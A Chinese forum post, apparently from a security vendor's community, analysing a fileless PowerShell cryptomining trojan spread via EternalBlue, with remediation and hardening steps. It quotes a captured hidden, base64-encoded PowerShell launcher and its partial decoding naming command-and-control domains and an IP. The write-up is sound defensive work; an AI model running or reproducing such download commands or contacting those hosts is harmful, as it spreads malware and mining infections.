#原创分享#驱动人生木马全新升级开启powershell无文件挖矿新模式
  

请君江南扫落花 45652人觉得有帮助

{{ttag.title}}
1.根据客户反馈的问题现象是服务器经常会自动断网,断网后就自动重启,服务器遭受暴力破解攻击,先通过edr配置暴力破解检测,对攻击的IP进行封堵

227115dcd28b26bddd.png
903205dcd28c31183b.png
2.     针对于服务器重启和断网的现象,我们通过EDR开启微隔离策略,配置外部访问服务器其他端口的流量全部拒绝,只允许业务流量访问
953255dcd28cf13fd6.png
449205dcd28e5f23d9.png

3.     针对于服务器存在的高级威胁攻击,我们可以通过阻止powershell脚本执行,这个病毒主要是利用永恒之蓝漏洞攻击的木马变种永恒之蓝下载器木马,新的木马变种更新“无文件”攻击模块,该版本的攻击代码全部以Powershell脚本形式执行
764215dcd28ee3e4d8.png
297515dcd28fa7ece7.png

4.     新的攻击方式会在攻击后的Payload中直接在目标机器创建后门计划任务,并通过该计划任务将木马具有的多个恶意程序进行下载
91305dcd29058eb74.png
388605dcd290dc0940.png
5.     下面就是列举出服务器里面随机命名的计划任务,以及下载的木马,这是具体powershell执行的命令,解密后看到是下载一个木马文件,通过解码分析是存在挖矿行为
818855dcd292151e06.png


powershell.exe -NoP -NonI -W Hidden -EJABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuADcAaAA0AHUAawAuAGMAbwBtACcALAAnADEAOAA1AC4AMQAyADgALgA0ADMALgA2ADIAJwAsACcAaQBuAGYAbwAuADcAaAA0AHUAawAuAGMAbwBtACcAKQANAAoAJABuAGkAYwA9ACcAdQBwAGQAYQB0AGUALgA3AGgANAB1AGsALgBjAG8AbQAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAA
BASE64解密后得到的内容
$se=@('update.7h4uk.com','185.128.43.62','info.7h4uk.com')
$nic='update.7h4uk.com'
foreach($t in $se)
6.通过微步在线分析后发现是通过powershell在执行挖矿的动作
593285dcd29305c977.png
920665dcd293971afe.png
7.基本上现可以确认的是这是一次由永恒之蓝木马下载器变种利用powershell无文件攻击,远程下载木马病毒和挖矿脚本在内网挖矿,横向扩散,对服务器的处理建议如下
1.任务计划删除定时任务;
2.按顺序kill PID 3964、3180和cohernece.exe;
3.已在WMI中将root\default:System_Anti_Virus_Core的funs、i17、ipsu、mimi、mon、sc、ver属性删除;
4.已删除cohernece.exe和antivirus*.htm

安全加固建议
1.服务器暂时关闭不必要的端口(如135-139、445)或者通过edr的微隔离进行访问限制
2.服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解
3.使用杀毒软件拦截可能的病毒攻击,任务计划删除定时任务
4.如果服务器用不到powershell,可以把这个程序卸载或者删除

打赏鼓励作者,期待更多好文!

打赏
4人已打赏

Sangfor_闪电回_朱丽 发表于 2019-11-15 15:22
  
您好,感谢您参与社区原创分享计划4,您的文章已被收录到计划中,交由专家评审小组评审,分享奖励将在活动结束后统一安排发放!分享越多,奖励越多,期待您更多的精彩分享哦!:感恩:
呆呆蛙 发表于 2019-11-18 10:16
  
回帖是美德
新手850916 发表于 2019-11-18 22:50
  
???????????????????
新手312552 发表于 2019-11-18 23:35
  
学习打卡,感谢分享,虽然看的不是很明白
新手157258 发表于 2019-11-18 23:41
  
感谢楼主的分享,这个很重要。
新手254119 发表于 2019-11-18 23:48
  
感谢楼主的分享,这个很重要。
新手035969 发表于 2019-11-18 23:48
  
刚好想学习这个,感谢分享
这西瓜我吃定了233 发表于 2019-11-19 09:29
  
都是实战经验,这波分享很强势
新手031815 发表于 2019-11-19 09:58
  
打卡学习,开心开心
发表新帖
热门标签
全部标签>
每日一问
产品连连看
技术笔记
GIF动图学习
信服课堂视频
干货满满
新版本体验
「智能机器人」
技术咨询
技术争霸赛
畅聊IT
技术圆桌
功能体验
专家分享
标准化排查
答题自测
专家问答
安装部署配置
安全攻防
每日一记
信服圈儿
S豆商城资讯
运维工具
SANGFOR资讯
SDP百科
排障笔记本
在线直播
MVP
网络基础知识
升级
上网策略
测试报告
日志审计
问题分析处理
流量管理
云计算知识
用户认证
原创分享
解决方案
sangfor周刊
VPN 对接
项目案例
技术顾问
信服故事
功能咨询
终端接入
授权
设备维护
资源访问
地址转换
虚拟机
存储
迁移
加速技术
产品预警公告
玩转零信任

本版版主

217
234
151

发帖

粉丝

关注

本版达人

新手61940...

本周建议达人

二进制网络

本周分享达人